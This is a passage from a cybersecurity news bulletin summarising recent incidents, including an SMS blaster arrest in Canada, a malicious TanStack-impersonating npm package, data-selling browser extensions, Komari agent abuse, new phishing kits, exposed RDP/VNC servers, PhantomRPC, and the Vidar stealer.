ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories  Ravie Lakshmanan  Apr 30, 2026 Hacking News / Cybersecurity News The internet is noisy this week. We are seeing some wild new tactics, like people using fake cell towers to send scam texts, while some developers are accidentally downloading tools that peek into their private files during a simple install. It is definitely a busy time to be online. Security is always a moving target. Millions of servers are currently sitting online without any passwords, and old software bugs are showing up in the most unexpected places. Even with the right fixes available, staying one step ahead is a full-time job for all of us. Data is shifting in strange ways, too. Some browser tools are now legally selling user history for profit, and new kits are making it simpler for almost anyone to launch a campaign. You have to see these latest updates to believe them. Let’s look at the full list... SMS blaster phishing crackdown Canadian Authorities Arrest 3 Men for Alleged Use of SMS Blaster Canadian authorities have arrested three men for operating an SMS blaster device that masquerades as a cellular tower to send phishing texts to nearby phones. These tools trick devices into connecting to them by emitting signals that mimic a legitimate tower. "An SMS blaster works by mimicking a legitimate cellular tower. When nearby phones connect to it, users receive fraudulent text messages that appear to come from trusted organizations," authorities said . "These messages often prompt recipients to click on links that lead to fake websites designed to capture personal information, including banking credentials and passwords." The three men are facing 44 charges in connection with the crime. About tens of thousands of devices were connected to the blaster over several months, the official said. This is the first time that an SMS blaster has been spotted in the country. npm brandsquat data theft npm Package Brand-Squats TanStack to Exfiltrate Environment Variables A new supply chain attack has leveraged an npm package impersonating TanStack to ship malicious versions that exfiltrate environment variables from developers’ machines during install. The package, named tanstack, is designed to "silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint," Socket said . The malicious package is maintained by a user named "sh20raj." Versions 2.0.4 through 2.0.7 are confirmed malicious. Extensions legally sell user data Extension Developers Sell Data of At Least 6.5M Users In a new analysis, LayerX found that multiple networks of browser extensions collect user data and resell it for profit. Unlike malicious extensions that conceal their behavior by offering some harmless functionality, the identified 80 extensions explicitly inform users in their privacy policy that they collect and sell data of users who install their extensions. "A network of 24 media extensions that are installed on 800,000 users and collect viewing data and demographic information on major streaming platforms such as Netflix, Hulu, Disney+, Amazon Prime Video, HBO, Apple TV, and others," LayerX said . "12 separate ad blockers with a combined install base of over 5.5 million users openly selling user data. Nearly 50 other extensions, with over 100,000 users in aggregate, that collected and resold users’ browsing data." Komari tool weaponized in attacks First Recorded Abuse of Komari Agent Huntress has revealed that unknown threat actors used stolen VPN credentials to pivot into a Windows workstation belonging to an unspecified organization via Impacket's smbexec.py, and dropped a SYSTEM-level backdoor using the Komari agent, a Go-based remote-control, monitoring, and management tool. The development marks the first publicly documented case of the tool being abused in a real-world intrusion. It also illustrates how bad actors are increasingly switching to publicly available and legitimate tools to conduct attacks. "Komari is not a telemetry tool that happens to be abusable - it is a bidirectional control channel by design. The agent opens a persistent WebSocket to its server and accepts three server-to-agent event types out of the box: exec (arbitrary command execution via PowerShell / sh), terminal (interactive PTY reverse shell in the operator's browser), and ping (ICMP / TCP / HTTP probing)," Huntress said . "All three are enabled by default." Whereas other tools like Velociraptor and SimpleHelp that have been abused by threat actors typically act as means to an end, Komari gives an operator arbitrary command execution, an interactive PTY reverse shell, and network probing by default, over a TLS-fronted WebSocket. Next-gen phishing kits escalate New Saiga 2FA and Phoenix System Phishing Kits Spotted Threat actors have detailed two new phishing kits named Saiga 2FA and Phoenix System that have been linked to emails and SMS phishing attacks. According to Barracuda, Saiga 2FA goes beyond traditional adversary-in-the-middle ( AitM ) features by integrating tools like FM Scanner for extracting and analyzing mailbox content. "Saiga 2FA is an example of how phishing kits are evolving into application-level platforms," the company said . "Unlike traditional phishing kits, Saiga integrates infrastructure, automation, and post-compromise capabilities into a unified system, supporting advanced and highly targeted campaigns." Phoenix System, on the other hand, has been tied to over 2,500 phishing domains since January 2025, while relying on IP-based filtering and geofencing for precision targeting. It's assessed to be the successor to the now-defunct Mouse System. "The campaigns are delivered via SMS, potentially leveraging fake Base Transceiver Stations (BTS) to bypass carrier-level filtering and allow threat actors to send messages that appear under the brand names of trusted organizations directly to victims," Group-IB said . "The campaign has so far targeted more than 70 organizations across the financial services, telecommunications, and logistics sectors globally." Mass exposure of remote access servers Exposed RDP and VNC Servers Found A new analysis from Forescout has found 1.8 million RDP and 1.6 million VNC servers are exposed on the internet. "China accounts for 22% of exposed RDP and 70% of exposed VNC servers; the U.S. accounts for 20% and 7%; Germany accounts for 8% and 2%," the company said . "Of 91,000 RDP and 29,000 VNC servers mapped to specific industries, retail, services, and education lead RDP exposure; education, services, and healthcare lead VNC." What's more, 18% of exposed RDP servers run end-of-life Windows versions, more than 19,000 RDP servers remain vulnerable to BlueKeep (CVE-2019-0708), and nearly 60,000 VNC servers have authentication disabled. To make matters worse, more than 670 exposed VNC servers have authentication disabled and provide direct access to OT/ICS control panels. China-linked influence op falters Spamouflage Attempts to Influence Tibetan Parliament-in-Exile Elections A China-linked online influence campaign attempted to undermine April 26 elections for the Tibetan parliament-in-exile with little impact. The operation, part of Spamouflage , a long-running influence network linked to Beijing, has used a cluster of 90 Facebook profiles and 13 Instagram profiles to push criticism of the Tibetan government-in-exile and its leadership. "The network tries to drive wedges within the community," DFRLab said . "The goal is to erode trust in the exile government, weaken its international voice, and raise doubts about whether it can credibly represent Tibetans without the Dalai Lama. However, virtually none of these posts seem to have attracted any organic engagement, possibly because all the identified assets are regular Facebook profiles with limited reach and not established pages." Unpatched RPC privilege escalation Windows PhantomRPC Privilege Escalation Remains Unpatched An unpatched vulnerability can allow for local privilege escalation in Windows systems through the abuse of the Remote Procedure Call (RPC) architecture in the operating system. Called PhantomRPC , the flaw stems from an architectural weakness in how RPC handles connections to unavailable services. To exploit the flaw , an attacker with limited local access needs to first compromise a privileged service that runs under the Network Service identity, deploy a fake RPC server with the same RPC interface UUID and exposed endpoint name (i.e., TermService), listen to specific requests, and then impersonate the targeted service to escalate their privileges to SYSTEM. Kaspersky, which identified the weakness, said it discovered four PhantomRPC exploitation paths that could lead to privilege escalation. Following responsible disclosure in September 2025, Microsoft opted to not address the issue as it requires an attacker to first compromise the machine through some other means. Vidar dominates infostealer market Vidar Stealer Races to the Top The information stealer known as Vidar (now in its second iteration called Vidar Stealer 2.0 ) has vaulted to the top of the infostealer market since November 2025 in the aftermath of law enforcement takedowns of Lumma and Rhadamanthys. "Vidar profited from the generated chaos to rise to the top of the stealer ecosystem," Intrinsec said . "We assess that this rise was made available due to the release of version 2.0 of the malware, and to the collaboration with 'Cloud' Telegram channels." It's advertised by a user named "Loadbaks" on underground forums. Recent campaigns have been observed distributing malware that has used bogus links shared via YouTube videos promoting fake software to direct users to Mediafire pages, which are used to deliver executables responsible for downloading and running the broad-spectrum credential harves